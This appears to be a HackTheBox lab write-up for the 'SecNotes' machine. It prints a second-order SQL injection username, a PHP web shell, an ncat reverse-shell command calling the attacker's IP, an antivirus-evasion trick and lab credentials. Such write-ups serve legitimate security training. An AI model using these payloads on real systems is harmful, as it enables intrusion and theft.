TL;DR
The username field was susceptible to a Second Order SQL injection allowing us to list other user's notes. One note contained credentials that allowed us to login to a samba share storing files that were hosted by an HTTP server. Uploading a web shell gave us remote code execution from which we could spawn a persistent reverse shell. After enumerating the file system it could be seen that an Ubuntu subsystem was present. The root user's bash history disclosed credentials for the c$ share of the SMB server. Giving us access to download the root.txt flag.
User
As with any box we start with a Nmap scan. To get things underway quickly I perform only a partial scan that will try TCP SYN connections to the 1000 most common ports. I also give the -sV and -sC options these mean that ports will be probed to try to determine information about the running services and the default NSE scripts will also be run against relevant ports.
# nmap -sS -sV -sC -o nmap-tcp-initial.txt 10.10.10.97
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-15 15:49 GMT
Nmap scan report for 10.10.10.97
Host is up (0.042s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Secure Notes - Login
|_Requested resource was login.php
|_tomcat-scan: /manager/html is HTTP 404.
445/tcp open microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h40m00s, deviation: 4h37m10s, median: -1s
| smb-os-discovery:
| OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: SECNOTES
| NetBIOS computer name: SECNOTES\x00
| Workgroup: HTB\x00
|_ System time: 2018-11-15T07:49:32-08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2018-11-15 15:49:29
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.22 secondsThe scan finishes and has revealed two ports as well as some useful information about the system. We can see that:
- There is an
HTTPserver running on port 80.Nmaphas also detected that the server isMicrosoft IIS httpd 10.0this is a recent version and as such it is unlikely that the software is vulnerable. Microsoft Directory Servicesis running on port 445. From the scripts, we can see that the host operating system is likely to beWindows 10. It appears that theSMBserver doesn't allow anonymous login so we will need credentials to enumerate this further. This points to the web server being the entry point for this box.
When opened in a browser we are redirected to http://10.10.10.97/login.php which is a login page also giving the option to create an account.
Let us create an account and see where it takes us.
After signing in we are redirected to the above page. Immediately we can see a potential user [email protected] this is likely to come in handy later potentially with the SMB server. Now let's create a note and test for injections.
It appears that the notes are vulnerable to XSS but it is unlikely that this will help us. However, in order to prevent our browsers from running other user's XSS attempts, I would recommend disabling JavaScript for this site.
The Contact Us page also has an input field potentially allowing us to capture an admin session if the field is also susceptible to XSS. However, I decided to not pursue this path as in labs such as hackthebox cross site scripting is fairly rare due to the complexities implementing it involves. However, in this case there is a simulated user who provides an other route to a user level shell.
With this in mind, I log out and create a new user, this time testing the username and password fields. After trying a few different potentially problematic usernames, I was disheartened when nothing happened. It wasn't until I actually logged in with one of these usernames that a server error was thrown.
The username that caused this was ' suggesting that the site is vulnerable to second order SQL injection. The server error occurs in the home.php page, that normally displays the user's notes, and is likely occurring because the username is being stored by the application before being incorporated insecurely into the query for the user's notes. With this in mind, we can construct a username that will list all notes (even those of other users).
Creating a user with username test' or '1'='1 is enough. After logging in with this username the notes of all users are displayed.
There should be at least 3 notes plus any created by other users. If you've disabled JavaScript you won't be able to open the notes to see the contents. A solution to this is to simply press Ctrl + U to view the source of the page. Meanwhile, if you didn't disable JavaScript some hackthebox user probably has your PHPSESSID cookie for secnotes.htb (or worse) and all your notes are at more risk than they already were!
Regardless, the most interesting of the notes contains credentials to a share on the SMB server.
\\secnotes.htb\new-site
tyler / 92g!mA8BGjOirkL%OG*&
With this we can use the smbclient command to connect to the new-site share.
# smbclient -U tyler //10.10.10.97/new-site
Enter WORKGROUP\tyler's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 15 15:57:29 2018
.. D 0 Thu Nov 15 15:57:29 2018
blabla.php A 56 Thu Nov 15 15:50:07 2018
iisstart.htm A 696 Thu Jun 21 16:26:03 2018
iisstart.png A 98757 Thu Jun 21 16:26:03 2018
Microsoft D 0 Thu Nov 15 15:51:37 2018
nc.exe A 38616 Thu Nov 15 15:49:37 2018
nc64.exe A 45272 Thu Nov 15 15:50:36 2018
rev-shell.php A 202 Thu Nov 15 15:54:08 2018
12978687 blocks of size 4096. 7911779 blocks availableIgnoring the files that are clearly reverse shells, two files have been there significantly longer than the rest, we can assume these weren't created by users. They appear to be from the default configuration of an Internet Information Services server. Downloading iisstart.png with get and viewing it in my local machine confirms this. What does this mean? Well, somewhere there is a second version of IIS being hosted as these files aren't on the instance being run on port 80. We can also upload files to this server most likely leading to remote code execution. But where is said server?
Oh...
My desire for speed while nmaping this box has lead to me missing an open port. After running the scan again this time with the -p- option telling Nmap to scan the full port range we find an additional port running a second IIS server...
8808/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
|_tomcat-scan: /manager/html is HTTP 404.
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows
Once the port had been specified in the browser we see the Internet Information Services default landing page that I previously downloaded. Now the route to user.txt is clear.
We can now create a minimal php web shell giving us the ability to execute commands and perform basic enumeration. Which is enough to get the user.txt flag.
<?php system($_GET['cmd']); ?>
The above is enough to get the job done. We then put this into a file with a .php extension and upload it to the SMB server with put. Now if we request this file in a browser we have a rudimentary web shell that can be used to get user.txt by placing commands in the get parameters. With web shells, the output can often become difficult to read because of broken spacing and line breaks. A quick fix to this is to append view-source: to the front of the URL so that the output is not parsed by your browser.
After working out where the flag is we can print it with type C:\users\tyler\desktop\user.txt
Root
Now let's upgrade this web shell into an interactive shell. I found this to be a difficult process, at first, as many of my shells would drop as soon as I spawned them. This was because of the antivirus killing my sessions I tried to evade this and did so using the method below.
- I first uploaded
ncat.exeto the SMB server this is a version of netcat for windows. - Then I started the classic netcat listener on my client with
nc -vlnp 443. - Finally I used our existing web shell to spawn a reverse PowerShell to my client with.
cmd /K C:/inetpub/new-site/ncat.exe -nv 10.10.my.ip 443 -e powershell.exe
A short period after running the final command you should have a persistent user-level shell waiting for you.
# nc -vlnp 443
listening on [any] 443 ...
connect to [10.10.MY.IP] from (UNKNOWN) [10.10.10.97] 50039
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\inetpub\new-site>Now it is a lot easier to navigate the file system. However, our shell still drops seemingly arbitrarily, after looking in tyler's files we find a PowerShell script in C:\users\tyler\cleanup named cleanup.ps1.
while($true) {
Write-Host "Cleaning up new-site!"
Get-ChildItem -Path "C:\inetpub\new-site" -Exclude iisstart.* | Select -ExpandProperty FullName | Remove-Item -Force
Write-Host "Sleeping for 5 minutes..."
Start-Sleep -s 300
}
From looking at the code it is clear that this script is responsible for cleaning out files in the C:\inetpub\new-site directory - this is likely what was killing our shells. However, the script is configured so that it doesn't delete certain files matching iisstart.* so we can evade this by prefixing our web shell and ncat.exe with iisstart. for example iisstart.shelly.php and iisstart.ncat.exe.
Now we continue looking through the file system and see an interesting directory in C:\ it appears that Ubuntu is installed on this box.
Directory: C:\Distros\Ubuntu
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/21/2018 3:07 PM AppxMetadata
d----- 6/21/2018 3:07 PM Assets
d----- 6/21/2018 3:07 PM images
d----- 6/21/2018 5:51 PM temp
-a---- 7/11/2017 6:10 PM 190434 AppxBlockMap.xml
-a---- 7/11/2017 6:10 PM 2475 AppxManifest.xml
-a---- 7/11/2017 6:11 PM 10554 AppxSignature.p7x
-a---- 7/11/2017 6:10 PM 201254783 install.tar.gz
-a---- 7/11/2017 6:10 PM 4840 resources.pri
-a---- 7/11/2017 6:10 PM 222208 ubuntu.exe
-a---- 7/11/2017 6:10 PM 809 [Content_Types].xmlHow you may ask? Well the box is running Windows 10 so they have made use of the Windows Subsystem for Linux (WSL) which allows Linux binary executables in the ELF format to be run natively on Windows. We can try to start an interactive bash shell or execute commands in the subsystem with bash or bash -c [command] however this gives an error and yields no response for me (possibly an issue with my shell). After a short period googling we can find that the Ubuntu file system is stored and accessible on disk.
Directory:
C:\users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs
Mode LastWriteTime Length Name
---- ------------- ------ ----
da---- 6/21/2018 6:03 PM bin
da---- 6/21/2018 6:00 PM boot
da---- 6/21/2018 6:00 PM dev
da---- 6/22/2018 3:00 AM etc
da---- 6/21/2018 6:00 PM home
da---- 6/21/2018 6:00 PM lib
da---- 6/21/2018 6:00 PM lib64
da---- 6/21/2018 6:00 PM media
da---- 6/21/2018 6:03 PM mnt
da---- 6/21/2018 6:00 PM opt
da---- 6/21/2018 6:00 PM proc
da---- 6/22/2018 2:44 PM root
da---- 6/21/2018 6:00 PM run
da---- 6/22/2018 2:57 AM sbin
da---- 6/21/2018 6:00 PM snap
da---- 6/21/2018 6:00 PM srv
da---- 6/21/2018 6:00 PM sys
da---- 6/22/2018 2:25 PM tmp
da---- 6/21/2018 6:02 PM usr
da---- 6/21/2018 6:03 PM var
-a---- 6/22/2018 2:25 PM 87944 initLooking through the files we can see that there is a sole user root. This user doesn't have any user created files. However, a record of the commands they executed has been stored in .bash_history (by the system) allowing us to learn what the user has been doing.
PS C:\users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root> type .bash_history
type .bash_history
cd /mnt/c/
ls
cd Users/
cd /
cd ~
ls
pwd
mkdir filesystem
mount //127.0.0.1/c$ filesystem/
sudo apt install cifs-utils
mount //127.0.0.1/c$ filesystem/
mount //127.0.0.1/c$ filesystem/ -o user=administrator
cat /proc/filesystems
sudo modprobe cifs
smbclient
apt install smbclient
smbclient
smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$
> .bash_history
less .bash_history
exitFrom this, we can see credentials for the administrator user. If we connect to the share with the same command they used. We now have access to the full file system and can simply navigate to the Administrator's desktop and download the root.txt flag and print it locally.
smb: \Users\Administrator\Desktop\> ls
. DR 0 Sun Aug 19 18:01:17 2018
.. DR 0 Sun Aug 19 18:01:17 2018
desktop.ini AHS 282 Sun Aug 19 18:01:17 2018
Microsoft Edge.lnk A 1417 Sat Jun 23 00:45:06 2018
root.txt A 34 Sun Aug 19 18:03:54 2018
12978687 blocks of size 4096. 8049410 blocks available
smb: \Users\Administrator\Desktop\> get root.txt Takeaways
- There are more than 1000 ports - A balence between speed and thoroughness needs to be met.
- Stay Safe - Some vulnerabilities can be used against you and it is important to take the necessary steps to protect yourself.
- Keep it Simple - When an antivirus is running the simplest approaches can be the most effective. Whilst your meterpreter sessions will normally be flagged and killed almost immediately.
- Don't put Passwords in Commands - Putting passwords in commands is a bad practice as the passwords are then stored insecurely in logs such as
.bash_history. If the password was entered as secondary input we would only have a username preventing our access.